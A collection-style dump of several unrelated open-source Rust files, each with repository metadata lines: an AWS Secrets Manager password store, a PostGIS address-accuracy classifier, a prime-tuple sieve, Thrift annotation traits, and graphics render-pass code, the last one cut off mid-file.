module.add_function(wrap_pyfunction!(pairwise_metric_calculation_fromdisk, module)?)?; // module.add_function(wrap_pyfunction!(pairwise_metric_calculation_frommem, module)?)?; // module.add_function(wrap_pyfunction!(oneway_metric_calculation, module)?)?; // module.add_class::<ExperimentResults>()?; // Ok(()) // } #[pymodule] fn _calc_metrics(py: Python, module: &PyModule) -> PyResult<()> { module.add_function(wrap_pyfunction!(pairwise_metric_calculation_fromdisk, module)?)?; module.add_function(wrap_pyfunction!(pairwise_metric_calculation_frommem, module)?)?; module.add_function(wrap_pyfunction!(metric_calculation_fromdf, module)?)?; module.add_class::<ExperimentResults>()?; Ok(()) } #[test] fn check_reader(){ let obj = read_cluster_results("test_data/exp-0_resolution-0.4_knn-15_.csv.gz"); assert_eq!(obj.barcodes.len(), obj.labels.len()); }
true
f4945730d829c877ed9e66b05b378e251d4b199a
Rust
geofflittle/aws-pass
/src/store/default_pass_store.rs
UTF-8
5,894
2.703125
3
[]
no_license
use super::pass_store::PassStore; use crate::{ creds::StsLocalMfaCredsProvider, dao::{ pass_dao::Tag, pass_dao::{Filter, PassDao, Password}, sm_pass_dao::SmPassDao, }, util, }; use anyhow::Result; use async_trait::async_trait; use rusoto_core::Region; use std::fs; use std::{path::PathBuf, process}; use util::write_lines; const CREDENTIALS_FILENAME: &str = ".credentials"; const TOKEN_SERIAL_FILENAME: &str = ".token-serial"; // TODO: Fix tags const STORE_TAGS: (&str, &str) = ("aws-pass", "true"); const STORE_FILTERS: [(&str, [&str; 1]); 2] = [("tag-key", ["aws-pass"]), ("tag-value", ["true"])]; struct StoreDetails { access_key_id: String, secret_access_key: String, token_serial: String, } pub struct DefaultPassStore { store_dir: PathBuf, pass_dao: Box<dyn PassDao + Send + Sync>, } impl DefaultPassStore { pub fn new(store_dir: PathBuf, region: &Region) -> Box<dyn PassStore> { let creds_provider = StsLocalMfaCredsProvider::new( store_dir.join(CREDENTIALS_FILENAME), store_dir.join(TOKEN_SERIAL_FILENAME), region, ); Box::new(DefaultPassStore { store_dir, pass_dao: Box::new(SmPassDao::new(creds_provider, region)), }) } fn ensure_empty_store_dir(&self) { if self.store_dir.exists() && self.store_dir.is_dir() && self.store_dir.read_dir().unwrap().next().is_some() { fatal_println!("Store dir {} not empty, not overwriting", self.store_dir.display()) } if self.store_dir.exists() && self.store_dir.is_file() { fatal_println!("Store dir {} not a directory", self.store_dir.display()) } if !self.store_dir.exists() { println!("Creating store dir at {}", self.store_dir.display()); fs::create_dir(&self.store_dir).unwrap(); } } fn get_store_details(&self) -> StoreDetails { let access_key_id = util::prompt_non_empty_str("AWS Access Key Id"); let secret_access_key = util::prompt_non_empty_str("AWS Secret Access Key"); let token_serial = util::prompt_non_empty_str("MFA Token Serial Number"); StoreDetails { access_key_id, secret_access_key, token_serial, } } fn write_store_details( &self, StoreDetails { access_key_id, secret_access_key, token_serial, }: &StoreDetails, ) { let creds_path = self.store_dir.join(CREDENTIALS_FILENAME); write_lines( &creds_path, vec![ "[default]\n", format!("aws_access_key_id={}\n", access_key_id).as_ref(), format!("aws_secret_access_key={}\n", secret_access_key).as_ref(), ], ); let token_serial_path = self.store_dir.join(TOKEN_SERIAL_FILENAME); write_lines(&token_serial_path, vec![token_serial.as_ref()]); } async fn get_password_by_name(&self, name: &str) -> Result<Password> { let filters: Vec<Filter> = STORE_FILTERS .iter() .map(|f| (f.0.to_string(), f.1.iter().map(|s| s.to_string()).collect())) .collect(); self.pass_dao.get_password_by_name(name, Some(&filters)).await } } #[async_trait] impl PassStore for DefaultPassStore { async fn init(&self) { self.ensure_empty_store_dir(); println!( "Please provide AWS credentials for a user with an associated policy with MFA-protected SecretsManager \ permissions" ); let creds = self.get_store_details(); self.write_store_details(&creds); } async fn list(&self, prefix: Option<&str>) { let ssfilters = STORE_FILTERS .iter() .map(|f| (f.0.to_string(), f.1.iter().map(|s| s.to_string()).collect())) .collect(); let filters: Vec<Filter> = [ ssfilters, prefix .map(|p| vec![("name".to_string(), vec![p.to_string()])]) .unwrap_or_default(), ] .concat(); let passwords = self.pass_dao.list_passwords(&filters).await.unwrap(); let names: Vec<String> = passwords.into_iter().map(|p| p.name).collect(); println!("{}", names.join("\n")); } async fn show(&self, name: &str) { let password = self.get_password_by_name(name).await.unwrap(); println!("{}", password.value); } async fn insert(&self, name: &str) { let value = util::prompt_stdin_line("Enter password:"); let tags: Vec<Tag> = vec![(STORE_TAGS.0.to_string(), STORE_TAGS.1.to_string())]; self.pass_dao.create_password(name, &value, Some(&tags)).await.unwrap(); } async fn edit(&self, name: &str) { let password = self.get_password_by_name(name).await.unwrap(); let updated_password = edit::edit(password.value).unwrap().trim_end().to_string(); self.pass_dao .update_password(&password.id, &updated_password) .await .unwrap(); } async fn generate(&self, name: &str, exclude_chars: Option<&str>, length: Option<&i64>) { let tags: Vec<Tag> = vec![(STORE_TAGS.0.to_string(), STORE_TAGS.1.to_string())]; let password = self .pass_dao .create_random_password(name, exclude_chars, length, Some(&tags)) .await .unwrap(); println!("{}", password.value); } async fn remove(&self, name: &str) { let filters: Vec<Filter> = STORE_FILTERS .iter() .map(|f| (f.0.to_string(), f.1.iter().map(|s| s.to_string()).collect())) .collect(); self.pass_dao .delete_password_by_name(name, Some(&filters)) .await .unwrap(); } }
true
c9bc5ffa1609a3616106a56340f07f63e080cf45
Rust
ZenGo-X/pps-gc
/pps-garbled-circuits/src/plain.rs
UTF-8
3,309
3.09375
3
[ "MIT" ]
permissive
use std::{iter, ops}; use anyhow::{ensure, Result}; use rand::Rng; use super::byte_array::ByteArray; use super::consts::{INDEX_BYTES, LOCATION_BYTES}; #[derive(Copy, Clone, Debug, PartialEq)] pub struct TableSize { pub m: usize, pub l: usize, } // todo: remove const generic #[derive(PartialEq, Debug, Clone)] pub struct LocationTable { receivers: Box<[ByteArray<LOCATION_BYTES>]>, size: TableSize, } impl LocationTable { pub fn new(table: Box<[ByteArray<LOCATION_BYTES>]>, size: TableSize) -> Result<Self> { ensure!( table.len() == size.m * size.l, "table len={}, expected=m*l={}", table.len(), size.m * size.l ); Ok(Self { receivers: table, size, }) } pub fn random<R: Rng>(rng: &mut R, size: TableSize) -> Result<Self> { ensure!(size.m > 0, "m must be non-zero"); ensure!(size.l > 0, "l must be non-zero"); let gen_loc = || { let mut random_loc = [0u8; LOCATION_BYTES]; random_loc.iter_mut().for_each(|b| *b = rng.gen()); ByteArray::new(random_loc) }; Ok(Self { receivers: iter::repeat_with(gen_loc) .take(size.m * size.l) .collect::<Vec<_>>() .into_boxed_slice(), size, }) } pub fn rows(&self) -> impl Iterator<Item = &[ByteArray<LOCATION_BYTES>]> { self.receivers.chunks_exact(self.size.l) } pub fn size(&self) -> TableSize { self.size } } impl ops::Index<u16> for LocationTable { type Output = [ByteArray<LOCATION_BYTES>]; fn index(&self, receiver: u16) -> &Self::Output { let receiver = usize::from(receiver); &self.receivers[self.size.l * receiver..self.size.l * (receiver + 1)] } } #[derive(Clone)] pub struct IndexColumn { column: Box<[ByteArray<INDEX_BYTES>]>, m: usize, } impl IndexColumn { pub fn new(column: Box<[ByteArray<INDEX_BYTES>]>, m: usize) -> Result<Self> { ensure!(column.len() == m, "column size doesn't match m"); Ok(Self { column, m }) } pub fn random<R: Rng>(rng: &mut R, m: usize) -> Result<Self> { let column: Vec<_> = iter::repeat_with(|| rng.gen::<u16>()) .map(|x| x.to_be_bytes().into()) .take(m) .collect(); Ok(Self { column: column.into_boxed_slice(), m, }) } pub fn receivers(&self) -> impl Iterator<Item = &ByteArray<INDEX_BYTES>> { self.column.iter() } pub fn size(&self) -> usize { self.column.len() } } impl ops::Index<u16> for IndexColumn { type Output = ByteArray<INDEX_BYTES>; fn index(&self, receiver: u16) -> &Self::Output { &self.column[usize::from(receiver)] } } #[cfg(test)] mod tests { use rand::rngs::StdRng; use rand::SeedableRng; use super::*; #[test] fn same_seed_produces_same_table() { let rng = StdRng::seed_from_u64(1234); let params = TableSize { m: 3, l: 4 }; let table1 = LocationTable::random(&mut rng.clone(), params).unwrap(); let table2 = LocationTable::random(&mut rng.clone(), params).unwrap(); assert_eq!(table1, table2); } }
true
5887d143ff1315b0f43f02f770b58cc2bbcb8864
Rust
Guo-astro/pt2itp
/native/src/classify/mod.rs
UTF-8
7,222
2.515625
3
[ "BSD-3-Clause", "BSD-2-Clause" ]
permissive
use postgres::{Connection, TlsMode}; use std::{ collections::HashMap, convert::From, fs::File, io::{BufWriter, Write}, }; use neon::prelude::*; use crate::{ pg, pg::{InputTable, Table}, stream::{AddrStream, GeoStream, PolyStream}, Tokens, }; #[derive(Serialize, Deserialize, Debug)] struct ClassifyArgs { db: String, hecate: Option<bool>, buildings: Option<String>, parcels: Option<String>, input: Option<String>, output: Option<String>, } impl ClassifyArgs { pub fn new() -> Self { ClassifyArgs { db: String::from("classify"), hecate: None, buildings: None, parcels: None, input: None, output: None, } } } pub fn classify(mut cx: FunctionContext) -> JsResult<JsBoolean> { let args: ClassifyArgs = match cx.argument_opt(0) { None => ClassifyArgs::new(), Some(arg) => { if arg.is_a::<JsUndefined>() || arg.is_a::<JsNull>() { ClassifyArgs::new() } else { let arg_val = cx.argument::<JsValue>(0)?; neon_serde::from_value(&mut cx, arg_val)? } } }; let is_hecate = args.hecate.unwrap_or(false); let mut output = match args.output { None => panic!("Output file required"), Some(output) => match File::create(output) { Ok(outfile) => BufWriter::new(outfile), Err(err) => panic!("Unable to write to output file: {}", err), }, }; let conn = Connection::connect( format!("postgres://postgres@localhost:5432/{}", &args.db).as_str(), TlsMode::None, ) .unwrap(); let address = pg::Address::new(); address.create(&conn); address.input( &conn, AddrStream::new( GeoStream::new(args.input), crate::Context::new( String::from("xx"), None, Tokens::new(HashMap::new(), HashMap::new(), HashMap::new()), ), None, ), ); println!("ok - imported addresses"); if !is_hecate { // Hecate Addresses will already have ids present // If not hecate, create sequential ids for processing address.seq_id(&conn); println!("ok - generated seq id for addresses"); } address.index(&conn); let buildings = pg::Polygon::new(String::from("buildings")); buildings.create(&conn); match args.buildings { Some(buildings_in) => { buildings.input( &conn, PolyStream::new(GeoStream::new(Some(buildings_in)), None), ); buildings.index(&conn); println!("ok - imported buildings"); } None => (), }; let parcels = pg::Polygon::new(String::from("parcels")); parcels.create(&conn); match args.parcels { Some(parcels_in) => { parcels.input( &conn, PolyStream::new(GeoStream::new(Some(parcels_in)), None), ); parcels.index(&conn); println!("ok - imported parcels"); } None => (), }; conn.execute( " ALTER TABLE address ADD COLUMN accuracy TEXT ", &[], ) .unwrap(); conn.execute( " UPDATE address SET accuracy = 'rooftop' FROM buildings WHERE ST_Intersects(address.geom, buildings.geom) ", &[], ) .unwrap(); println!("ok - calculated accuracy: building"); conn.execute( " ALTER TABLE parcels ADD COLUMN centroid GEOMETRY(POINT, 4326) ", &[], ) .unwrap(); conn.execute( " UPDATE parcels SET centroid = ST_PointOnSurface(parcels.geom) ", &[], ) .unwrap(); println!("ok - calculated parcel centroids"); conn.execute( " UPDATE address SET accuracy = 'parcel' FROM parcels WHERE accuracy IS NULL AND ST_DWithin(address.geom, parcels.centroid, 0.0001) ", &[], ) .unwrap(); println!("ok - calculated accuracy: parcel"); conn.execute( " UPDATE address SET accuracy = 'point' WHERE accuracy IS NULL ", &[], ) .unwrap(); println!("ok - calculated accuracy: point"); let modified = match is_hecate { true => { conn.execute( r#" UPDATE address SET accuracy = NULL WHERE accuracy = props->>'accuracy' "#, &[], ) .unwrap(); conn.execute( r#" UPDATE address SET props = props::JSONB || JSON_Build_Object('accuracy', accuracy)::JSONB WHERE accuracy IS NOT NULL "#, &[], ) .unwrap(); println!("ok - outputting hecate addresses"); pg::Cursor::new( conn, format!( r#" SELECT JSON_Build_Object( 'id', id, 'type', 'Feature', 'action', 'modify', 'version', version, 'properties', props, 'geometry', ST_AsGeoJSON(ST_Force2D(geom))::JSON ) FROM address WHERE accuracy IS NOT NULL "# ), ) .unwrap() } false => { conn.execute( r#" UPDATE address SET props = props::JSONB || JSON_Build_Object('accuracy', accuracy)::JSONB "#, &[], ) .unwrap(); println!("ok - outputting addresses"); pg::Cursor::new( conn, format!( r#" SELECT JSON_Build_Object( 'id', id, 'type', 'Feature', 'properties', props, 'geometry', ST_AsGeoJSON(ST_Force2D(geom))::JSON ) FROM address "# ), ) .unwrap() } }; for feat in modified { let feat = format!("{}\n", feat.to_string()); if output.write(feat.as_bytes()).is_err() { panic!("Failed to write to output stream"); } } if output.flush().is_err() { panic!("Failed to flush output stream"); } Ok(cx.boolean(true)) }
true
40c2a2930d96faad28200d205e950edfe6672d40
Rust
input-output-hk/jormungandr
/jcli/src/jcli_lib/transaction/info.rs
UTF-8
3,506
2.515625
3
[ "MIT", "Apache-2.0" ]
permissive
use crate::jcli_lib::{ transaction::{common, Error}, utils::{io, OutputFormat}, }; use chain_addr::AddressReadable; use chain_impl_mockchain::transaction::{Balance, UnspecifiedAccountIdentifier}; use jormungandr_lib::{crypto::hash::Hash, interfaces::TransactionInputType}; use serde_json::json; use std::{io::Write, path::PathBuf}; use structopt::StructOpt; #[derive(StructOpt)] #[structopt(rename_all = "kebab-case")] pub struct Info { #[structopt(flatten)] common: common::CommonTransaction, #[structopt(flatten)] fee: common::CommonFees, /// write the info in the given file or print it to the standard output #[structopt(long = "output")] output: Option<PathBuf>, #[structopt(flatten)] output_format: OutputFormat, /// set the address prefix to use when displaying the addresses #[structopt(long = "prefix", default_value = "ca")] address_prefix: String, } impl Info { pub fn exec(self) -> Result<(), Error> { let staging = self.common.load()?; let inputs = staging .inputs() .iter() .map(|input| match input.input { TransactionInputType::Utxo(utxo_ptr, index) => Ok(json!({ "kind": "utxo", "value": input.value, "txid": Hash::from(utxo_ptr), "index": index, })), TransactionInputType::Account(account) => { let account_id = UnspecifiedAccountIdentifier::from(account) .to_single_account() .ok_or(Error::InfoExpectedSingleAccount)?; Ok(json!({ "kind": "account", "value": input.value, "account": account_id.to_string(), })) } }) .collect::<Result<Vec<_>, Error>>()?; let outputs = staging.outputs().iter().map(|output| { json!({ "address": AddressReadable::from_address(&self.address_prefix, output.address().as_ref()).to_string(), "value": output.value(), }) }).collect::<Vec<_>>(); let fee_algo = self.fee.linear_fee(); let balance = match staging.balance(&fee_algo)? { Balance::Negative(value) | Balance::Positive(value) => value.0, Balance::Zero => 0, }; let info = json!({ "status": staging.staging_kind_name(), "sign_data_hash": staging.transaction_sign_data_hash()?.to_string(), "num_inputs": staging.inputs().len(), "num_outputs": staging.outputs().len(), "num_witnesses": staging.witness_count(), "input": staging.total_input()?.0, "output": staging.total_output()?.0, "fee": staging.fees(&fee_algo).0, "balance": balance, "inputs": inputs, "outputs": outputs, }); let mut output = io::open_file_write(&self.output).map_err(|source| Error::InfoFileWriteFailed { source, path: self.output.clone().unwrap_or_default(), })?; writeln!(output, "{}", self.output_format.format_json(info)?).map_err(|source| { Error::InfoFileWriteFailed { source, path: self.output.clone().unwrap_or_default(), } })?; Ok(()) } }
true
229b0fb1df16c43d8bb93030c9e2f76a0ef57830
Rust
jannikkeye/monkey-rust
/interpreter/src/repl.rs
UTF-8
1,366
2.875
3
[]
no_license
use crate::evaluator; use crate::lexer; use crate::object::Object; use crate::parser; use std::io::{stdin, stdout, Write}; const PROMPT: &str = ">> "; pub fn start() { println!( " WELCOME TO THE MONKEY PROGRAMMING LANGUAGE! HAVE FUN, HUMAN! " ); let mut evaluator = evaluator::Evaluator::new(); loop { let mut input = String::new(); print!("{}", PROMPT); stdout().flush().expect("Error flushing stdout"); stdin() .read_line(&mut input) .expect("Error reading from STDIN"); let lexer = lexer::Lexer::new(&input); let mut parser = parser::Parser::new(lexer); let program = parser.parse_program().expect("parsing failed"); if !parser.errors.is_empty() { println!("Whoops! We ran into some monkey business here!"); println!("parse errors:"); for e in parser.errors.iter() { println!("\t{}", e); } continue; } let evaluated = evaluator.eval(program); if let Some(eval) = evaluated { if let Object::Error(_) = &eval { println!("Whoops! We ran into some monkey business here!"); println!("evaluation error:"); } println!("{}", eval); println!("\n"); } } }
true
e69fedec3021e886fa624ab70ca863f8fec9244d
Rust
facebook/fbthrift
/thrift/lib/rust/src/metadata.rs
UTF-8
2,843
2.953125
3
[ "Apache-2.0" ]
permissive
/* * Copyright (c) Meta Platforms, Inc. and affiliates. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ pub trait ThriftAnnotations: 'static { /// Returns the structured annotation `T` that is defined on this Thrift type, if the /// annotation exists. fn get_structured_annotation<T: Sized + 'static>() -> Option<T> { None } /// Returns the structured annotation `T` that is defined on the given field with id `field_id` /// on this Thrift type. /// /// Returns `None` if the field ID does not exist or if the given `T` does not exist as an /// annotation on the given field. /// /// For example, for the given Thrift file: /// ```thrift /// struct FieldAnnotation { /// 1: string payload; /// } /// /// struct Foo { /// @FieldAnnotation{ payload = "hello world" } /// 1: string username; /// } /// ``` /// /// The call /// ```ignore /// <Foo as ThriftAnnotations>::get_field_structured_annotation::<FieldAnnotation>(1) /// ``` /// will return /// ```ignore /// Some(FieldAnnotation { /// payload: "hello world".to_string(), /// }) /// ``` fn get_field_structured_annotation<T: Sized + 'static>(_field_id: i16) -> Option<T> { None } } /// Identical to [ThriftAnnotations] but is implemented on the unit type (), for which /// `get_structured_annotation` and `get_field_structured_annotation` will always return `None`. /// /// This allows a method to take `<T: MaybeThriftAnnotations>` to express the logic of "give me a /// privacy aware Thrift struct OR a 'void' type to indicate no type". pub trait MaybeThriftAnnotations: 'static { fn get_structured_annotation<T: Sized + 'static>() -> Option<T> { None } fn get_field_structured_annotation<T: Sized + 'static>(_field_id: i16) -> Option<T> { None } } impl<S: ThriftAnnotations> MaybeThriftAnnotations for S { fn get_structured_annotation<T: Sized + 'static>() -> Option<T> { <S as ThriftAnnotations>::get_structured_annotation::<T>() } fn get_field_structured_annotation<T: Sized + 'static>(field_id: i16) -> Option<T> { <S as ThriftAnnotations>::get_field_structured_annotation::<T>(field_id) } } impl MaybeThriftAnnotations for () {}
true
297cc6a5589b2361446912ceee84aa7dd97d1f20
Rust
c410-f3r/rust-smallvec
/src/array.rs
UTF-8
1,048
3.578125
4
[ "MIT", "Apache-2.0" ]
permissive
/// Types that can be used as the backing store for a SmallVec pub unsafe trait Array { /// The type of the array's elements. type Item; /// Returns a mutable pointer to the first element of the array. fn as_mut_ptr(&mut self) -> *mut Self::Item; /// Returns a pointer to the first element of the array. fn as_ptr(&self) -> *const Self::Item; /// Returns the number of items the array can hold. fn size() -> usize; } macro_rules! impl_array( ($($size:expr),+) => { $( unsafe impl<T> Array for [T; $size] { type Item = T; fn as_mut_ptr(&mut self) -> *mut T { self.as_mut().as_mut_ptr() } fn as_ptr(&self) -> *const T { self.as_ref().as_ptr() } fn size() -> usize { $size } } )+ } ); impl_array!( 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 20, 24, 32, 36, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100_000 );
true
e5ecfd859d12c8347de7fea22806d2b7e7425b88
Rust
MichaelBell/tuplesieve
/src/main.rs
UTF-8
4,109
3
3
[]
no_license
use std::io::{self, Write}; const TUPLE_LEN: usize = 10; const MAX_PRIME: usize = 1400; const MAX_PRIME_OVER_2: usize = MAX_PRIME / 2; const MIN_PRIME: usize = 3; const SIEVE_SIZE: usize = 1000000; const MAX_GAP: usize = 120000000; // 3, 5 at 4 // 7 at 10 // 11 at 14, 16 // So mod 2310 we have (1271, 1691) //const OFFSETS: [u32; TUPLE_LEN] = [0, 2, 6, 8, 12, 18, 20, 26, 30, 32]; // // 3 at 4 // 5 at 8 // 7 at 8 // 11 at 16, 18 // So mod 2310 we have (587, 1007) const OFFSETS: [u32; TUPLE_LEN] = [0, 2, 6, 12, 14, 20, 24, 26, 30, 32]; const BASE: u32 = 587; struct PrimeAndOffset { prime: u32, offset: [usize; TUPLE_LEN], } fn get_primes() -> [u8; MAX_PRIME_OVER_2] { let mut sieve: [u8; MAX_PRIME_OVER_2] = [0; MAX_PRIME_OVER_2]; for p in (MIN_PRIME..MAX_PRIME).step_by(2) { if sieve[p >> 1] == 0 { for q in ((p + (p >> 1))..MAX_PRIME_OVER_2).step_by(p) { sieve[q] = 1; } } } sieve } fn mod_inverse(n: u32, p: u32) -> u32 { // Stupid version is fine for i in 1..p-1 { if (i * n) % p == 1 { return i } } panic!("Failed modular inverse for {} % {}", n, p); } // Tuple is of form 2310f + o // Offsets solve // f_i = o.2310^-1 % p fn make_offsets(prime_sieve: [u8; MAX_PRIME_OVER_2]) -> Vec<PrimeAndOffset> { let mut poff: Vec<PrimeAndOffset> = Vec::new(); for i in 6..MAX_PRIME_OVER_2 { if prime_sieve[i] == 0 { let p = (i*2 + 1) as u32; let prim_mod_p = 2310 % p; let prim_inv = mod_inverse(prim_mod_p, p); let mut offset: [usize; TUPLE_LEN] = [0; TUPLE_LEN]; for i in 0..TUPLE_LEN { offset[i] = (((OFFSETS[i] + BASE) * prim_inv) % p) as usize; if offset[i] != 0 { offset[i] = p as usize - offset[i]; } assert!(((offset[i] * 2310) as u32 + OFFSETS[i] + BASE) % p == 0); } poff.push(PrimeAndOffset { prime: p, offset: offset, }); } } poff } fn run_sieve(poff_arr: &mut Vec<PrimeAndOffset>) -> Vec<usize> { let mut sieve: [u8; SIEVE_SIZE] = [0; SIEVE_SIZE]; for poff in poff_arr.iter_mut() { let p = poff.prime as usize; for i in 0..TUPLE_LEN { for j in (poff.offset[i]..SIEVE_SIZE).step_by(p) { sieve[j] = 1; } let sieve_adjust = SIEVE_SIZE % p; if poff.offset[i] < sieve_adjust { poff.offset[i] += p - sieve_adjust; } else { poff.offset[i] -= sieve_adjust; } } } let mut results : Vec<usize> = Vec::new(); for i in 0..SIEVE_SIZE { if sieve[i] == 0 { results.push(i); } } results } fn tuple_from_offset(offset: usize) -> usize { offset * 2310 + BASE as usize } fn main() { use std::mem; assert!(mem::size_of::<usize>() >= 8); let prime_sieve = get_primes(); let mut poff_arr = make_offsets(prime_sieve); let mut tuples: Vec<usize> = Vec::new(); for batch in 0..700000 { let results = run_sieve(&mut poff_arr); for i in results { tuples.push(i + batch * SIEVE_SIZE); } print!("{}\r", batch); io::stdout().flush().unwrap(); } println!("Done sieving"); use multimap::MultiMap; let mut gaps = MultiMap::new(); for i in 0..tuples.len() { for j in i+1..tuples.len() { let gap = tuples[j] - tuples[i]; if gap > MAX_GAP { break; } if tuples[i] > gap { if let Some(first_tuple_vec) = gaps.get_vec(&gap) { if first_tuple_vec.contains(&(tuples[i] - gap)) { if tuples.contains(&(tuples[j] + gap)) { //println!("Gap: {} Tuples: {} {} {}", gap, tuple_from_offset(tuples[i] - gap), tuple_from_offset(tuples[i]), tuple_from_offset(tuples[j])); // println!("*** Set of 4! {}", tuple_from_offset(tuples[j] + gap)); println!("{}, {}, {}, {}, ", tuple_from_offset(tuples[i] - gap), tuple_from_offset(tuples[i]), tuple_from_offset(tuples[j]), tuple_from_offset(tuples[j] + gap)); } } } } gaps.insert(gap, tuples[i]); } if (i & 0x7fff) == 0 && tuples[i] > MAX_GAP { let limit = tuples[i] - MAX_GAP; gaps.retain(|_, &ft| { ft > limit }); print!("{}/{}\r", i, tuples.len()); io::stdout().flush().unwrap(); } } }
true
94dd9152d339f35f9c431441d871c79a2e637bdc
Rust
teohhanhui/makepad
/render/src/pass.rs
UTF-8
7,690
2.609375
3
[ "MIT" ]
permissive
use crate::cx::*; #[derive(Default, Clone)] pub struct Pass { pub pass_id: Option<usize> } impl Pass { pub fn begin_pass(&mut self, cx: &mut Cx) { if self.pass_id.is_none() { // we need to allocate a CxPass self.pass_id = Some(if cx.passes_free.len() != 0 { cx.passes_free.pop().unwrap() } else { cx.passes.push(CxPass::default()); cx.passes.len() - 1 }); } let pass_id = self.pass_id.unwrap(); if let Some(window_id) = cx.window_stack.last() { if cx.windows[*window_id].main_pass_id.is_none() { // we are the main pass of a window let cxpass = &mut cx.passes[pass_id]; cx.windows[*window_id].main_pass_id = Some(pass_id); cxpass.dep_of = CxPassDepOf::Window(*window_id); cxpass.pass_size = cx.windows[*window_id].get_inner_size(); cx.current_dpi_factor = cx.get_delegated_dpi_factor(pass_id); } else if let Some(dep_of_pass_id) = cx.pass_stack.last() { let dep_of_pass_id = *dep_of_pass_id; cx.passes[pass_id].dep_of = CxPassDepOf::Pass(dep_of_pass_id); cx.passes[pass_id].pass_size = cx.passes[dep_of_pass_id].pass_size; cx.current_dpi_factor = cx.get_delegated_dpi_factor(dep_of_pass_id); } else { cx.passes[pass_id].dep_of = CxPassDepOf::None; cx.passes[pass_id].override_dpi_factor = Some(1.0); cx.current_dpi_factor = 1.0; } } else { cx.passes[pass_id].dep_of = CxPassDepOf::None; cx.passes[pass_id].override_dpi_factor = Some(1.0); cx.current_dpi_factor = 1.0; } let cxpass = &mut cx.passes[pass_id]; cxpass.main_view_id = None; cxpass.color_textures.truncate(0); cx.pass_stack.push(pass_id); //let pass_size = cxpass.pass_size; //self.set_ortho_matrix(cx, Vec2::zero(), pass_size); } pub fn override_dpi_factor(&mut self, cx: &mut Cx, dpi_factor:f32){ if let Some(pass_id) = self.pass_id { cx.passes[pass_id].override_dpi_factor = Some(dpi_factor); cx.current_dpi_factor = dpi_factor; } } pub fn make_dep_of_pass(&mut self, cx: &mut Cx, pass: &Pass) { let cxpass = &mut cx.passes[self.pass_id.unwrap()]; if let Some(pass_id) = pass.pass_id { cxpass.dep_of = CxPassDepOf::Pass(pass_id) } else { cxpass.dep_of = CxPassDepOf::None } } pub fn set_size(&mut self, cx: &mut Cx, pass_size: Vec2) { let cxpass = &mut cx.passes[self.pass_id.unwrap()]; cxpass.pass_size = pass_size; } pub fn add_color_texture(&mut self, cx: &mut Cx, texture: &mut Texture, clear_color: ClearColor) { texture.set_desc(cx, None); let pass_id = self.pass_id.expect("Please call add_color_texture after begin_pass"); let cxpass = &mut cx.passes[pass_id]; cxpass.color_textures.push(CxPassColorTexture { texture_id: texture.texture_id.unwrap(), clear_color: clear_color }) } pub fn set_depth_texture(&mut self, cx: &mut Cx, texture: &mut Texture, clear_depth: ClearDepth) { texture.set_desc(cx, None); let pass_id = self.pass_id.expect("Please call set_depth_texture after begin_pass"); let cxpass = &mut cx.passes[pass_id]; cxpass.depth_texture = texture.texture_id; cxpass.clear_depth = clear_depth; } pub fn end_pass(&mut self, cx: &mut Cx) { cx.pass_stack.pop(); if cx.pass_stack.len()>0{ cx.current_dpi_factor = cx.get_delegated_dpi_factor(*cx.pass_stack.last().unwrap()); } } pub fn redraw_pass_area(&mut self, cx: &mut Cx) { if let Some(pass_id) = self.pass_id { cx.redraw_pass_and_sub_passes(pass_id); } } } #[derive(Clone)] pub enum ClearColor { InitWith(Color), ClearWith(Color) } impl Default for ClearColor { fn default() -> Self { ClearColor::ClearWith(Color::default()) } } #[derive(Clone)] pub enum ClearDepth { InitWith(f64), ClearWith(f64) } #[derive(Default, Clone)] pub struct CxPassColorTexture { pub clear_color: ClearColor, pub texture_id: usize } #[derive(Default, Clone)] #[repr(C)] pub struct PassUniforms{ camera_projection:[f32;16], camera_view:[f32;16], dpi_factor:f32, dpi_dilate:f32, pad1:f32, pad2:f32 } impl PassUniforms{ pub fn as_slice(&self)->&[f32;std::mem::size_of::<PassUniforms>()]{ unsafe{std::mem::transmute(self)} } } #[derive(Clone)] pub struct CxPass { pub color_textures: Vec<CxPassColorTexture>, pub depth_texture: Option<usize>, pub clear_depth: ClearDepth, pub depth_init: f64, pub override_dpi_factor: Option<f32>, pub main_view_id: Option<usize>, pub dep_of: CxPassDepOf, pub paint_dirty: bool, pub pass_size: Vec2, pub pass_uniforms: PassUniforms, pub zbias_step: f32, pub platform: CxPlatformPass, } impl Default for CxPass { fn default() -> Self { CxPass { zbias_step: 0.001, pass_uniforms: PassUniforms::default(), color_textures: Vec::new(), depth_texture: None, override_dpi_factor: None, clear_depth: ClearDepth::ClearWith(1.0), depth_init: 1.0, main_view_id: None, dep_of: CxPassDepOf::None, paint_dirty: false, pass_size: Vec2::default(), platform: CxPlatformPass::default() } } } #[derive(Clone, Debug)] pub enum CxPassDepOf { Window(usize), Pass(usize), None } impl CxPass { pub fn def_uniforms(sg: ShaderGen) -> ShaderGen { sg.compose(shader_ast!({ let camera_projection: mat4<PassUniform>; let camera_view: mat4<PassUniform>; let dpi_factor: float<PassUniform>; let dpi_dilate: float<PassUniform>; })) } pub fn uniform_camera_projection(&mut self, v: &Mat4) { //dump in uniforms for i in 0..16 { self.pass_uniforms.camera_projection[i] = v.v[i]; } } pub fn uniform_camera_view(&mut self, v: &Mat4) { //dump in uniforms for i in 0..16 { self.pass_uniforms.camera_view[i] = v.v[i]; } } pub fn set_dpi_factor(&mut self, dpi_factor: f32) { let dpi_dilate = (2. - dpi_factor).max(0.).min(1.); self.pass_uniforms.dpi_factor = dpi_factor; self.pass_uniforms.dpi_dilate = dpi_dilate; } pub fn set_ortho_matrix(&mut self, offset: Vec2, size: Vec2) { let ortho_matrix = Mat4::ortho( offset.x, offset.x + size.x, offset.y, offset.y + size.y, 100., -100., 1.0, 1.0 ); //println!("{} {}", ortho_matrix.v[10], ortho_matrix.v[14]); //println!("CHECK {} {} {:?}", size.x, size.y,ortho_matrix.transform_vec4(Vec4{x:200.,y:300.,z:100.,w:1.0})); self.uniform_camera_projection(&ortho_matrix); //self.set_matrix(cx, 